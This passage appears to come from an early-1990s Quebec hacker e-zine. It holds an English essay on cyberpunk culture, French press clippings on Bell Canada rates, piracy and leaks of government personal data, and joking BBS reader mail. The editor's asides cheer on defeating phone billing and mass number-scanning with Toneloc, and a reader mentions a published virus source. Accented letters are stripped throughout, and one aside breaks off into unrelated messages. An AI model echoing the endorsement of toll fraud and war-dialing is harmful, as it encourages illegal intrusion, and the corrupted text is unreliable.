global states. These entities are located not so much in one geographical location but throughout the world via global networks on the electronic frontier. In this electronic landscape, cyberpunks see a future where those who have information will be separated from thoose who don't. By disseminating information - be it corporate plans or top-secret government operations - they believe they can take on self-as-sumed roles that range from benign socioopolitical watchdogs capable of averting global opression to anarchists retaliating against corporate greed by wreaking havoc on computer systems - or as electronic terrorists ready, willing, and able to take out an enemy simply by shutting down systems. It comes as no surprise then that the governement is up in arms. In Secret Service and FBI circles - the government agencies charged with computer law enforcement - the term cyberpunk has almost come to mean computer criminal. And cases like the 1988 Internet "worm" have undoubtedly fed the crackdown fever. Created by 25-year-old Robert Morris, the worm shut down some 6,500 computers and caused an esimated $150,000 to $200 million worth of damages to computer systems nationwide. Because his defense attorneys were able to prove the destruction was unintentional, Morris was sentenced to a $10,000 fine and 400 community- service hours. Since then, there have been several instances of what the hackers clam are government attempts to suppress the cyberpunk media. Steve Jackson Games is a case inpoint. Secret Service agents raided this small Austin-based games manufacturer - publishers of fantasy-role-playing and board games - in March 1990. They seized computers and a stack of software disks and ransacked the company's warejouse. Some materieals seized in the raid, including the game GURPS Cyberpunk, have yet to be released, and Jackson has filed a civil suit against the government as a result. Spurred by this incident, the computer community rallied, holding a meeting on the WELL in late spring 1990. Mitch Kapor, creator of Lotus 1- 2-3; Apple cofounder Steve Wozniak; Sun Microsystems pioneer John Gilmore; and computer enthusiast and Grateful Dead soongwriter John Perry Barlow formed the Electronic Frontier Foundation to protect freedom of speech and expression in cyberspace. With the recent arrests of numerous hackers for illegal entry and data possession, the battles over control of the electronic frontier and hackers'rights are now being waged in court. One critical issue is whether information belongs to a given corporation or government or whether it belongs to the world. for those who are relaying information through computer networks and zines, here is also the question of First Amendment rights' or Hackers'Richts. How free is a free press in the electronic medium? This debate over intellectual freedom isn't entirely benign. The access to knowledge, like freedom, is risky when absolute. Things have changed in the hacker community. the first generation of young computer enthusiasts, now in their twenties, operated from a more mature, concerned-for-the-future frameof reference. But synergy admits danger may lie ahead with the new generation of hackers: "The new kids on the block, the new 14-year-old cast and crew, don't have a very good handle on morality, knowing what they should and souldn't be doing with these wonderful tools they have." Furthermore, computer technology has outmoded old forms of political power. "Anyone who was around in the Sixties is aware of the concept that all political power comes from the barrel of a gun and the power to control is the power to destroy," Synergy says. "Now, with information tools, people like me have the capability and the access - because of the way system is structured - to shut everything down - not just locally, but globally. And, it's getting worse every day. Interestingly, Synergy's vision of the future liew on the opposite end of the cyberpunk spectrum from Gibson's. "I think Gibson is about the most pessimistic mother fucker I've ever run into," says Synergy. "His basic premise is that science will be abused, period. I tend to be more of an optimist: If we were going to blow each other up, we'd have done it by now. And, actually having been inside and looked around, I seriously doubt whether we actually could blow ourselves up." "Well, if you're living in south Central Los Angeles," says Gibson, "the world is a lot uglier than the world in Neuromancer. And, in some cases, you'd be very lucky to wind up with the Neuromancer future. It's hardly the most dystopian vision." The cyberpunk future is still up for grabs - between utopia and dystopia. But indications are that the world will be one of corporate states, moving away from governments of locales to goveernments of multinational corporations whose increasing monopolization of information wields more and more power and control over individuals as well as nation states. The new tools for diplomacy, politics, espionage, and terrotism will be electronic ones. While cyberpunk seems to have the potential for being the most potent, effective, bohemian force ever to take on civilization, its impact remains to be seen. One thing, however, is certain: CYBERPUNK ISN'T JUST SCIENCE FICTION ANYMORE. Leeched from LE JOURNAL BELL - 18 janvier 93 LA MESSAGERIE VOCALE FLIRTE AVEC LA TLCOPIE Dbut de janvier, FaxCall, un nouvel outil des Systmes de messagerie vocale intgrs, qui permet d'expdier de la documentation par tlcopie, faisait son entre chez Bell. Ce service, disponible pour la clientle externe depuis septembre dernier, est offert l'interne par InfoCENTRE. Son fonctionnement est simple. Quand on appelle une messagerie vocale quipe de FaxCall, un message indique que de la documentation crite est disponible sur le tlcopieur. Pour l'obtenir, il n'y a qu' suivre les consignes que dicte le message. D'ici la fin du premier trimestre, les employs de Bell seront en mesure d'obtenir de la documentation tlcopie sur une foule de sujets qui vont des avantages sociaux aux relations de travail en passant par toute la gamme des produits et services des Tlboutiques. Et l'quipe d'InfoCENTRE sera heureuse de crer de nouvelles applications pour les groupes qui en feront la demande. On peut contacter InfoCENTRE en composant le (514) 870-4141. Vous avez envie d'essayer FaxCall? Faites le 870-9156. On vous expdiera immdiatement une tlcopie de cet article de mme que de la documentation supplmentaire! - 30 - Leeched from LE JOURNAL DE QUBEC - Lundi 8 fvrier 93 LA BELL AFFAIRE! par Jean-Philippe Decarie Pour un grand coup, c'en fut tout un. En annonant, vendredi, qu'elle comptait dposer une requte auprs du CRTC afin de l'autoriser hausser de 50% son tarif de base, Bell Canada a fait mentir l'expression populaire anglaise "Il n'y a pas de quoi crire sa mre". Avec une telle hausse apprhende, on est tous mieux d'appeler nos mres avant septembre, parce que, aprs cette date, il sera plus conomique de correspondre par la poste! videmment, j'exagre. Mais dans le contexte actuel d'une inflation enraye, d'une croissance timide et d'une reprise incertaine, la requte de bell Canada est audacieuse, pour ne pas dire irraliste. Il fallait s'attendre que notre compagnie de tlphone, qui a toujours vcu sous la coupe dore d'un monopole, ajuste sa grille tarifaire son nouvel environnement concurrentiel. Mais tous s'attendaient ce que Bell ait au moins subir les contrecoups de la drglementation dans l'interurbain avant de frapper sur le service de base qu'elle finance perte depuis des annes. A titre d'entreprise de service public qui n'a jamais eu souffrir de concurrence -par opposition Gaz Mtro, par exemple, qui doit affronter quotidiennement la machine d'tat qu'est Hydro-Qubec- Bell a toujours bnfici d'un taux de rendement allchant. Entre 12.5% et 13.5% annuellement, et ce, sans avoir de concurrents dans les pattes. C'est en vertu de ce taux de rendement que Bell a enregistr des profits de 1 milliard, en 1992, et a permis son holding, BCE, de dgager un bnfice net de 1,4 milliard, pour l'anne. Combien d'entreprises ont pu raliser un tel taux de rendement au cours des trois dernires annes alors que plusieurs d'entre elles ont plutt assist l'effondrement de leur march? Beaucoup de ces entreprises se seraient contentes de raliser le rendement de 7% qu'offrent les certificats de placement des banques pour des termes de cinq ans! La ralit Le pire dans tout cela, c'est que Bell Canada est justifie, ou sera justifie, d'augmenter le cot de son service de base. Depuis quatre ans, dj, que Bell nous prvient que le jour o le march de l'interurbain ne sera plus sa cagnotte exclusive, elle devra facturer les clients de son service de base en consquence. On le sait, pour que nous ayons droit une facture mensuelle d'une dizaine de dollars, il en cote 40 $ par mois Bell pour fournir cette seule ligne tlphonique. De tout temps, Bell a appliqu une politique d'interfinancement en utilisant les gnreux profits de l'interurbain pour soutenir le service de base. L'arrive massive des entreprises qui achtent des circuits tlphoniques pour les louer rabais certains clients et, surtout, l'entre en scne d'Unitel, appuye par AT&T, qui va concurrencer Bell directement auprs des simples usagers pour les interurbains, ne permettra plus notre compagnie de tlphone de financer son service de base. Ce sera donc nous de payer la juste part du cot d'utilisation de notre tlphone. Sauf que bell nous demande de payer ds avril une premire augmentation et une seconde, en septembre, afin de se prmunir contre la baisse du taux de rendement de son action la Bourse. L'immense majorit des sept millions de clients de Bell Canada n'est pas actionnaire de la compagnie et ne se serait pas sentie menace d'absorber la hausse de tarifs sur une ou deux annes, mme si le taux de rendement en souffre un peu. La menace que nous brandit Bell Canada de voir ses possibilits de financement rduites sur les marchs financiers, si son taux de rendement est affect, ne justifie pas une augmentation du tarif de base aussi abrupte dans le temps. - 30 - [Blitz- Le mec est timor, tout de mme. Travaillerait-il pour Bell, pour tre aussi doux? Le jour vient, mes frres (et il vient vite) o il va falloir payer pour chaque appel qu'on fait. Votre tarif de base va comprendre quelque chose comme 150 appels par mois, et chaque appel supplmentaire va vous coter dix sous. Imaginez l'horreur pour les babs, ou pour ceux qui scannent 50 ou 60 mille numros par mois avec Toneloc! Bell ouvre donc la porte d'autres formes d'abus de la part de ses utilisateurs, car il est bien certain que nous allons, tous ensemble, trouver le moyen de contrer cette facturation honte...] Leeched from LA PRESSE - Lundi 15 fvrier 1993 INTERURBAIN: LA CONCURRENCE MOINS RENTABLE QUE PRVU POUR LE CONSOMMATEUR Presse Canadienne - La concurrence dans l'interurbain pourrait ne pas offrir aux Canadiens les grandes conomies annonces, croit une experte amricaine. "Le march de l'interurbain a t ouvert la concurrence aux tats-unis il y a neuf ans, nous connaissons donc ce qui pourrait advenir au Canada", raconte Minnie Rajwar, du Telecommunications Research and Action Center, de Washington. Cet organisme but non lucratif examine les activits et tarifs des trois grandes compagnies d'interurbain et des centaines de compagnies rgionales apparues durant la dcennie, dans ce riche march. Les compagnies promettent de fortes conomies la clientle mais, explique en entrevue Mme Rajwar, les vraies rductions sur la facture sont souvent moindres que ce qui avait t miroit. "D'habitude, les compagnies parlent de rductions de 20 30 p. cent. Mais selon nos chiffres, l'conomie vritable n'est que de 8 p. cent environ." Suivant le problme au USA - et possiblement au Canada - les factures viennent toujours des compagnies locales ou rgionales. Certaines de ces grandes compagnies de services ont ajout au service local des frais supplmentaires, qui en fait annulent les conomies sur l'interurbain. En juin 1992, le CRTC a autoris la concurrence dans l'interurbain au Canada. Mais des recours devant les tribunaux en ont retard jusqu'en janvier l'avnement, entre cinq compagnies nationales et rgionales. La plus grande, Bell canada, a dj demand au CRTC de hausser ses tarifs locaux de 65 p. cent, en commenant le 1er avril. Si cela est autoris au complet, la base du tarif mensuel local, Toronto, Ottawa et Montral, grimperait de 12.60 $ 19 $. Bell Canada rtorque qu'elle n'a pas accru son tarif local de puis 10 ans et qu'il lui faut cette augmentation, pour compenser la perte de son monopole de l'interurbain qui rapportait de gros profits. "L'ampleur des hausses demandes est scandaleuse", lance George Horhota, de la Canadian Business Telecommunications Alliance. "Ne vous scandalisez pas, dit Mme Rajwar, c'est la ralit que subissent dj les Amricains. Nous disons d'abord au gens de ne pas croire ces annonces la tlvision, qui promettent des conomies d'interurbain. Surveillez bien le montant, au bas de votre facture. Selon M. Eamon Hoey, consultant en communications, le seul moyen pour les Canadiens d'viter cette situation est de protester avec nergie auprs du gouvernement fdral. "L'poque de Maman Bell est rvolue. Les Canadiens doivent forcer Ottawa empcher que la stabilit des tarifs locaux soit sacrifie la concurrence dans l'interurbain", affirme M. Hoey. Une vraie concurrence dans l'interurbain pourrait faire conomiser aux abonns rsidentiels et commerciaux jusqu' 2 milliards par anne, dit-il. - 30 - Leeched from LA PRESSE - Lundi 21 fvrier 1993 DES ABONNS DE BELL DISENT LEUR INDIGNATION AU CRTC Un monopole puissant, trs riche et qui n'a d'gard pour personne Presse Canadienne- La demande de Bell Canada pour tre autorise augmenter de 60 p. cent cette anne les tarifs locaux de ses clients en Ontario et au Qubec a soulev la fureur de certains abonns. Ils ont fait part de leur indignation dans des lettres adresses au Conseil de la radiodiffusion et des tlcommunications canadiennes (CRTC), qui a invit les abonns faire connatre leurs point de vue sur l'augmentation des tarifs demand par Bell, ainsi que sur son plan visant largir les zones d'appel local Ottawa, Toronto et Montral. Des 159 lettres reues jusqu' maintenant, quelques-unes demandaient des prcisions, tandis que 23 appuyaient une certaine hausse des tarifs ou l'largissement des zones d'appel local. Un abonn g a crit: "Je suis pris en otage dans ma propre province. Vous tes oblig de payer, sinon on vous coupe le tlphone." Un groupe de locataires a crit: "Nous esprons que le CRTC rejettera cette tentative outrageante de Bell Canada de donner la prfrence ses actionnaires plutt qu' ses abonns gs et aux autres qui ont fait de Bell Canada ce qu'elle est aujourd'hui: Un monopole puissant, trs riche et qui n'a d'gard pour personne." Parmi les questions souleves par ceux et celles qui s'opposaient l'augmentation des tarifs, il y avait notamment: -Les avantages de l'largissement des districts d'appel local s'appliquent une minorit, mais seraient pays par la majorit. -Bell cherche liminer la concurrence sur les interurbains en largissant ses zones d'appel local. -Bell ralise des profits plus que raisonnables. -Si Bell a besoin de plus d'argent, elle devrait rduire ses dpenses inutiles comme les autres entreprises ont d le faire durant la rcession. -Bell utilise la concurrence dans le march interurbain comme une excuse pour hausser les tarifs locaux, mais la concurrence est toujours inexistante dans de nombreuses rgions desservies par Bell. D'autres ont crit pour dire qu'ils avaient perdu leurs emplois ou taient des personnes ges ayant un revenu fixe et ne pouvaient pas payer les hausses de tarif. Bell prcise que les augmentations rapporteront la compagnie 210 millions de plus en 1993 et 450 millions en 1994. Leeched from LE SOLEIL - Vendredi 5 fvrier Tel est pris qui se croyait cbl... HARTFORD (Reuter) - Bien mal cbl ne profite jamais. C'est ce qu'on dcouvert leurs dpens 140 tlspectateurs amricains trop malins, qui utilisaient des dcodeurs pirates pour s'offrir gratuitement les programmes d'une chane cble. Ils n'ont pu rsister au tee-shirt gratuit que leur offrait la chane Continental Cablevision pendant la retransmission d'un match de boxe. Un simple coup de fil au numro de tlphone affich l'cran suffisait pour obtenir le superbe cadeau. Ce qu'ignoraient les fraudeurs, c'est que le message ne pouvait tre aperu que par les dtenteurs d'un dcodeur pirate, qui ont tlphon en toute candeur la chane. "Ca a march comme un charme. Les gens qui ont appel nous ont donn leurs noms et adresses pour que nous puissions leur envoyer le tee-shirt", a expliqu un responsable de la Continental. Ils ont reu la place une amende de 2000 $ US. (Dumb fucks! - Blitzkreig) ------------------ Leeched from LE NOUVEL OBSERVATEUR No 1473 du 28 janvier au 3 fvrier (contribution de Satan's Ghost - Paris - ces deux entrefilets entouraient un long article assez soporifique sur les jeux vido, que nous ne reproduiront pas ici... Le premier entrefilet concerne des cas de kids britanniques qui faisaient des crises d'pilepsie devant leur SNES...) EPILEPSIE: SUPER MARIO INNOCENT par Grard Petitjean M. Nintendo et M. Sega ont eu chaud. Quand la rumeur a commenc de courir dans les colonnes de la presse britannique, les ftes de Nol taient passes. Les ventes de consoles taient faites. Tous ces gamins qui avaient eu le bon got d'attendre la fin du rveillon pour faire une crise d'pilepsie aprs avoir titill leur console pendant des heures ont rendu un fier service la Bourse de Tokyo. Le titre Nintendo n'a perdu que 100 yens. Pour l'instant, une dizaine d'enfants ont t atteints sur la plante. C'est peu: on dnombre 150 millions de fans de "Sonic" ou de "Super Mario" travers le monde. Et pas trop inquitant. car, nous apprennent les neurologues, la console ne fabrique pas des pileptiques: elle les rvle, en soumettant les yeux de l'enfant une lumire intermittente. Test que pratiquent les neurologues dans leurs cabinets pour dceler une ventuelle propension l'pilepsie. La tlvision joue parfois des tours du mme genre. Au XIXe sicle dj, on observait une recrudescence des crises d'pilepsie dans les diligences qui empruntaient, les jours de soleil, les routes bordes de platane du sud de la France. Il faut donc conseiller aux nintendomaniaques de ne pas jouer trop longtemps, de s'installer dans une pice bien claire, etc. Autant de conseils qui figureront l'avenir sur les emballages des consoles. PIRATES par Grard Petitjean "Je n'ai jamais achet un jeu. Pourtant je joue presque tous les jours. Simplement, ds qu'on me parle d'un super logiciel, j'attends qu'un de mes copains me le procure. En gnral, je n'attends pas longtemps..." Sbastien a des copains pirates. Pas sur L'le de la Tortue: Puteaux. Des dieux de l'informatique qui se jouent des piges tendus par les diteurs ceux qui voudraient s'approprier leurs oeuvres sans passer par le tiroir- caisse. Un vrai gang. "Le premier qui voit un jeu, que ce soit en France, en Angleterre ou aux tats-unis, l'achte et l'envoie par modem aux "crackers" qui vont le "dplomber". Et l, c'est la course: celui qui casse le plus vite la protection d'un jeu est reconnu par ses pairs, il accde des rseaux o il bnificiera son tour de logiciels dplombs..." Sbastien a un copain qui fait partie de ces rseaux. La protection la plus coriace qu'il ait rencontre lui a demand quatre jours d'efforts. Gnralement, un quart d'heure suffit. Bien sr, ces exploits n'arrachent pas de cris d'admiration aux diteurs de jeux. Pour trois jeux que nous vendons, affirment-ils, il y en a dix en circulation. "Ils sont paranos!, disent les journalistes de "GEN 4", qui connaissent bien leur petit milieu. "Disons qu'il y a plutt un jeu copi pour un vendu. Et toutes ces copies, les diteurs savent trs bien qu'ils ne les auraient jamais vendues. On prend un jeu pirat "pour voir". On conservera la copie si le jeu ne vaut pas le coup. S'il est bon, si on sent qu'on va passer des semaines dessus, on l'achte." - 30 - [ Les deux prochains articles de Michel Venne sont tirs d'une srie d'articles crits pour le quotidien LE DEVOIR, srie intitule L'TAT SAIT TOUT. La srie dans son entier mrite d'tre lue, soyez-en srs, mais nous ne reproduirons ici, du moins ce mois-ci, que deux articles parmi tous ceux parus, le premier parce qu'il dmontre qu'quifax est une compagnie de crosseurs, et le deuxime parce que... vous verrez bien... -Blitzkreig ] Leeched from LE DEVOIR - 11 fvrier 1993 DES FONCTIONNAIRES DANS LE MARCH NOIR DU RENSEIGNEMENT CONFIDENTIEL par Michel Venne Des fonctionnaires paient leurs informateurs avec des renseignements confidentiels. LE DEVOIR a tent l'exprience. Ca marche... Les fichiers de renseignements personnels du gouvernement sont des paniers percs. Le vrificateur gnral a dj mis en lumire les lacunes des systmes de scurit des banques de donnes. LE DEVOIR a pu exprimenter le march noir du renseignement personnel. C'est, au Qubec, un march florissant. Deux enquteurs privs, compltement indpendants l'un de l'autre, ont accept de collaborer avec nous. et trois citoyens cobayes nous ont permis de faire enqute sur eux. Nous avons fourni nos deux enquteurs le nom et le numro d'assurance-sociale de nos cobayes. Quelques jours plus tard, ils nous ont communiqu l'adresse, le numro de tlphone, la date de naissance de nos amis ainsi que, le cas chant, l'ge des enfants, le montant des prestations d'aide sociale et d'assurance- chmage qui leur sont ou leur ont t verses et pendant combien de temps, le numro d'aide sociale, le numro de permis de conduire, le contenu du dossier conducteur (points d'inaptitude) dtenu par la Socit de l'assurance automobile, le contenu de leur dossier la commission de la sant et de la scurit du travail (CSST). Nos cobayes nous ont certifi n'avoir jamais communiqu avec ces dtectives et n'avoir jamais fait l'objet d'aucune enqute dans leur entourage. Ces renseignements ont t recueillis au sein du gouvernement. Lorsque nos deux Sherlock Holmes ont fait leur rapport, nous leur avons propos de couvrir leurs frais. Nous imaginions que leurs contacts leur fournissaient ces renseignements contre rmunration. Mais il n'en tait rien. Des fonctionnaires fournissent en effet gracieusement des renseignements confidentiels des enquteurs privs, en change de leur collaboration. L'un de nos deux dtectives privs quelques contacts au service des enqutes de l'aide sociale. Ces contacts, dit-il, lui fournissent le contenu de dossiers de bnficiaires dont ses clients, des avocats gnralement, cherchent retrouver la trace. En change, il leur promet de leur fournir des informations sur des assists sociaux qui font l'objet d'une enqute pour fraude. S'il apprend qu'un assist social travaille au noir, par exemple, il le dnonce. Cet enquteur priv dj t employ du Bureau de crdit de Montral (quifax). A ce titre, il communiquait souvent ses contacts au sein du gouvernement la fiche de crdit d'un contribuable souponn de fraude. C'est ainsi qu'il rcompensait ses informateurs. En retour, ces commis de l'tat rmunraient leur clandestin collaborateur avec des renseignements personnels appartenant d'honntes citoyens qui s'attendent la confidentialit. Le second dtective qui a collabor avec nous corrobore sans hsitation cette version des faits. "J'aide des fonctionnaires faire leur travail", dit-il tout bonnement. Il affirme servir parfois d'intermdiaire pour un fonctionnaire de l'aide sociale qui voudrait vrifier une information sur un bnficiaire que possde la CSST. Des fonctionnaires prfrent cependant agir contre espces sonnantes et trbuchantes et arrondir leurs fins de mois en acceptant quelques billets sous la table. L'une de nos sources relate le cas d'un enquteur de l'aide sociale qui fournissait de 75 100 dossiers d'assists sociaux par jour un collgue du bureau de crdit. Il recevait en retour 1$ par dossier. D'autres acceptent pour leurs bons services une bouteille de cognac Nol. Ces liaisons dangereuses existent dans peu prs tous les organismes publics dtenteurs de fichiers importants. La Sret du Qubec et son Centre de renseignement policier, Parthenais, n'y chappent pas, selon nos sources. Dans son bulletin d'information confidentiel de dcembre 1991, le Centre admet candidement devoir "malheureusement dplorer plusieurs bris de scurit au niveau de l,aspect confidentiel des informations contenues au CRPQ". Il arrive que des fonctionnaires se font prendre ce petit jeu. Et lorsque c'est le cas, la justice ne s'acharne pas sur le sort du coupable. Un fonctionnaire de l'assurance-chmage a t reconnu coupable en dcembre dernier d'avoir vendu (20$ pice, pour un magot d'au moins 2000$), des renseignements personnels sur des chmeurs un ami dtective priv. Le tribunal lui a accord une libration conditionnelle un don de 55$ la Socit canadienne du cancer... A la suite d'un reportage du journaliste Normand Lester Radio-Canada en octobre dernier, faisant tat d'un trafic semblable l'aide sociale, le ministre de la Main-d'oeuvre et de la Scurit du revenu a suspendu de ses fonctions un de ses employs pour la dure d'une enqute qui est en cours la Sret du Qubec. La porte-parole du ministre Andr Bourbeau affirme qu'il s'agit d'un "cas isol", que les systmes d'information du ministre sont "toute preuve" cet gard. Les employs signent un engagement de confidentialit, dit-elle. Ce n'tait pas la premire fois que ce ministre tait mis en cause pour bris de confidentialit. En 1988, le ministre Pierre Paradis avait d dclencher une enqute policire sur un trafic de renseignements. Deux fonctionnaires avaient t poursuivis en justice. Le prsident de la Commission d'accs l'information, M. Paul-Andr Comeau, est conscient de l'existence de ce march noir. "On peut promettre la confidentialit, dit-il en entrevue. Mais on ne pourra jamais promettre qu'il n'y aura jamais de fraude. Parce que c'est une composante de la nature humaine." Si la technologie "amplifie le risque", M. Comeau rappelle "que les dossiers de papier circulaient, tranaient et se vendaient". Il note toutefois qu'avec le dveloppement des technologies de l'information, les tats se sont dots de lois pour protger la vie prive. Le gouvernement du Qubec, dit-il, "a dcid de se morigner lui-mme", en 1982, en se dotant d'une loi cette fin, qui n'existait pas avant l'informatique. Le problme, ajoute M. Comeau, c'est que les organismes oprent sans filet. Il donne l'exemple de la CSST o on a dcouvert que les 2000 employs ont accs aux fichiers d'un bnficiaire. Les consultations ne sont pas enregistres. De sorte qu'il est impossible de reprer la source d'une fuite. L'organisme doit, d'ici 1996, modifier son systme pour palier cette lacune. Dans ses deux derniers rapports annuels, le vrificateur gnral du Qubec, M. Guy Breton, identifie de nombreuses lacunes la scurit des systmes informatiques. "Il n'y a pas de proccupation quotidienne pour la scurit, dit-il en entrevue. Tout le monde n'est pas convaincu de la ncessit de protger l'information. Il s,est tabli une confiance que ca va bien, que ces machines s'autocontrlent et qu'on ne devrait pas s'nerver avec ca". De manire gnrale, M. Breton observe que les gens ne sont pas assez prudents avec les mots de passe et les codes qui leur donnent accs aux systmes. "Les gens se les prtent", dit-il, ou alors ils conservent le mme durant des annes. "Tout le monde sait que le mot de passe du collgue, c'est le nom de sa femme". M. Breton note que l'information, c'est le pouvoir. C'est pour cela que le gouvernement est puissant, dit-il. "Il l'a toute". Mais "quand il la laisse fuir, il y a des gens qui en profitent et qui se gagnent du pouvoir avec. La rgle, ajoute-t-il, devrait tre qu'on soit tous gaux devant ce que le gouvernement possde." - 30 - Leeched from LE DEVOIR - Vendredi 19 fvrier 1993 LA LOI SUR LA VIE PRIVE LAISSE DES TROUS BANTS...ET LE CONSEIL DU PATRONAT S'Y OPPOSE par Danny Vear Le Conseil du patronat s'oppose farouchement au projet de loi sur la protection des renseignements personnels dans le secteur priv. Au mieux, il en demande le retrait pur et simple. Au pire, il croit ncessaire que des amendements srieux y soient apports. "Le projet de loi 68 va trop loin. Il en demande trop aux entreprises", a affirm hier le prsident du Conseil du patronat du Qubec, Ghislain Dufour. Le CPQ croit que le ministre des Communications, Laurence Cannon, n'a pas mesur l'impact de son projet. Ainsi, toutes les entreprises qubcoises se verraient imposer un systme de protection des renseignements personnels qui est beaucoup plus strict, complexe et coteux que les systmes en vigueur dans les autres provinces canadiennes et dans les autres pays, crit le Conseil dans son mmoire prsent la Commission parlementaire charge d'examiner le projet de loi. (...) Les entreprises devraient constamment tenir jour leurs registres de renseignements personnels et veiller ce qu'ils soient exacts et complets. Ghislain Dufour reconnat que certains secteurs de l'conomie ont de mauvaises pratiques en ce qui concerne l'information sur les citoyens. Ce constat ne doit pas pousser le gouvernement rglementer tous les secteurs de l'conomie, dit-il. Le prsident du CPQ s'est port la dfense d'quifax, firme qui pratique le commerce des renseignements personnels, prpare des rapports de crdit aux institutions bancaires qui lui en font la demande et dtient des informations sur environ 4 millions de Qubcois. Selon lui, il est insens qu'quifax soit oblig d'informer chacune des personnes sur lequel elle dtient des informations de l'existence d'un tel dossier. Le prsident d'Quifax, Jean-Claude Chartrand, a dj exprim de srieuses rserves l'endroit du projet de loi 68. Enfin, le Conseil s'inquite des nouveaux pouvoirs de la Commission d'accs l'information, dmesurs, selon lui. Le Conseil du patronat souscrit aux objectifs viss par le projet de loi. Il croit toutefois que l'autorglementation des entreprises suffirait les atteindre. - 30 - Leeched from LE DEVOIR - lundi 8 fvrier 1993 par Michel Venne Big Brother LE RICIB, OU TOUT SAVOIR SUR N'IMPORTE QUI, N'IMPORTE QUAND [suit un graphique d'un rseau tellement pt que je dfie n'importe qui de reproduire a en ascii] (lgende du graphique: votre nom circule quelque part dans cette constellation de canaux de communication.) Le gouvernement du Qubec a autoris la cration d'une autoroute lectronique qui reliera tous les ministres et les organismes publics, dont la Rgie de l'assurance- maladie ou la Socit de l'assurance automobile. A un cot de 20 millions de dollars, Qubec cre un Rseau intgr de communications informatiques et bureautiques. Le Ricib - un super-rseau la fine pointe de l'informatique - remplacera une quinzaine de rseaux qui sont propres chacun des ministres, reliant Qubec Montral et quelques 200 villes travers la province. Il reliera aux centres-serveurs 27 000 micro-ordinateurs dissmins sur les pupitres des fonctionnaires. En somme, crit le ministre des Communications, le Ricb pourrait permettre " n'importe qui, partir d' peu prs n'importe quel terminal, d'avoir accs peu prs n'importe quelle information dans n'importe quel ordinateur, peu importe o l'un et l'autre se trouvent". L'accs au Ricib sera, certes, balis par les lois. Et des systmes de scurit empcheront l'information de circuler n'importe comment, nuance le directeur gnral des tlcommunications du ministre des Communications, M. Bernard Beauchemin. Le Ricib est ralis en collaboration avec l'entreprise prive et constitue un exemple probant de la manire dont le gouvernement veut aider l'industrie des technologies de l'information dvelopper un savoir- faire exportable. [Ca serait pas plutt parce que les twits du gouvernement n>Anonymous<< To : NpShit Staff Title: vIRUS EN pASCAL Votre source de virus en pascal ne marche meme pas gang d'epais. ----------------------------------- Bloody Steak rpond: Ecoute plains-toi celui qui l'a fait dans la version originale anglaise. C'est pas de notre calice de faute si on a pogn une mauvaise T-File fake christ-nous patience. ------------------------------------------------------------------ Msg #: [177/186] Base: NPShit Support Date : Mon 04 Jan 1992 11:37p Stat: Public From : MOST OF PEOPLE To : NpShit Staff Title: criss de tete Vous etes juste des calices de tetes enfler dans NPShit s'tu vrai? un credule ----------------------------------- Bloody Steak rpond: Ouin ben Eeeee... celui qui le dit celui qui l'est... Atreid Bavtron rpond: Miroir, miroir Gna Gna Gna... Flour Rider rpond: Ceux qui disent a c'est parce qui sont jaloux parce qui connaissent rien pentoute. Nous autres on est une MACHINE fake ecoeurez-nous pas. ------------------------------------------------------------------ Msg #: [178/186] Base: NPShit Support Date : Tue 05 Jan 1992 07:34a Stat: Public From : Sysop De Protovision To : NpShit Staff Title: hack-hack-hack Tins ca l'air que je suis pus rendu tout seul a mettre mon nom dans toute les T-PHILES pis les progs que je rammasse par dessus les vrai auteurs. (c)Caillou Chanceux. ----------------------------------- Bloody Steak rpond: Ouin comme t'es pomal habitu de faire a, pourquoi tu te joindrais pas nous? ------------------------------------------------------------------ Msg #: [179/186] Base: NPShit Support Date : Tue 05 Jan 1992 3:02p Stat: Public From : Most Of People To : NpShit Staff Title: Lamerz? Bon j'ai lu la definition du mot lamer dans le NPShit #1. Mais un gars qui Rip une texte file s'tu un lamer??? un Mutant Frosted ----------------------------------- Bloody Steak rpond: Ecoute selon Dental Flush, un Lamer s't'un ripper mais le mot ripper se reporte seulement des programmeurs. (Bonne dfaite n'est-ce pas?) Par contre tu as parfaitement le droit de rire de nous ce sujet et de nous traiter de morons. ------------------------------------------------------------------ Msg #: [180/186] Base: NPShit Support Date : Wed 06 Jan 1992 9:45a Stat: Public From : Toys 'R' Us (Julie Villeneuve #0) To : NpShit Staff Title: suck-suck-suck Wow les gars votre magazine est super. c'est trop hot. J'en rve la nuit. J'aimerais tre votre leecheux officiel. Zaknafein Mc'Craken ----------------------------------- BEEf BRoTH rpond: Merci. Nous recevons un nombre incalculable d'encouragements de nos nombreux lecteurs (t'es le seul). Grce vos encouragements, le magazine ne peut que s'amliorer en matire de ridicule. En passant, nos 2 premires issues de NPShit nous ont permis de prouver efficacement que le ridicule ne tue pas (pas pour l'instant du moins). Bloody Steak ajoute: (En passant comme tu trouves le magazine super, pour toi ca va etre 25$, un prix d'ami). Gelatine Butcher meurt d'envie de te demander: a te tenterait-tu d'ouvrir une section NPShit sur Amburger BBS? La seule condition c'est d'avoir moins de 14 ans! Merci de nous leecher! ------------------------------------------------------------------ Msg #: [181/186] Base: NPShit Support Date : Wed 06 Jan 1992 12:52p Stat: Public From : >>Anonymous<< To : NpShit Staff Title: chu essoufler! Chers NPShit, meme si ses le premiers numero, j'adore beaucoup votre magazine. je peut pas croire que y peut avoir du monde qui vous aimes pas c'est absurdre!!!!! moi je vous vois dans ma soupe pis dans ma pisse le matin, pis meme quand je chie a me fait penser vous-autres!!!! ----------------------------------- Socks Yogurt Eater rpond: On t'a reconnu, Blitzcrest, arrte de te lancer des fleurs en anonyme! ------------------------------------------------------------------ Msg #: [182/186] Base: NPShit Support Date : Wed 06 Jan 1992 2:28p Stat: Public From : IKEA-AC/DC To : NpShit Staff Title: hack en asm NPShit, j'ai un problme hacker un programme en assembleur. Aidez-moi! - IKEA-Assembled Creature ----------------------------------- Killer Ceiling Annihilator rpond: Euh... Euh... Mon frre me dit que ton problme se situe peut-tre dans le fait que les commentaires doivent toujours tre prcds d'un point-virgule. En passant, flash ton pseudo! a te dirait-tu d'embarquer dans NPShit? (Surtout que tu serais le seul qui connatrait l'assembleur!) ------------------------------------------------------------------ Msg #: [183/186] Base: NPShit Support Date : Wed 06 Jan 1992 3:16p Stat: Public From : Cramix To : NpShit Staff Title: Eeeeh... ouin a flasherait que vous preniez MAZg pour faire NPShit... tk a serait pomal plus beau non? }Cramix{ --- BustTag Use }MOCCO{ or die, sucker! ----------------------------------- Atreid Bavtron rpond: Penses-tu! C'est ben trop compliqu utiliser MAZg! Pis part de a c'est mme pas faite en VGA. C'est pour a qu'on prend des text files. Pis en passant pour ton magazine Alt-PrintScreen, a parle pas pantoute des mmes affaires! Nous autres premirement nos textes on 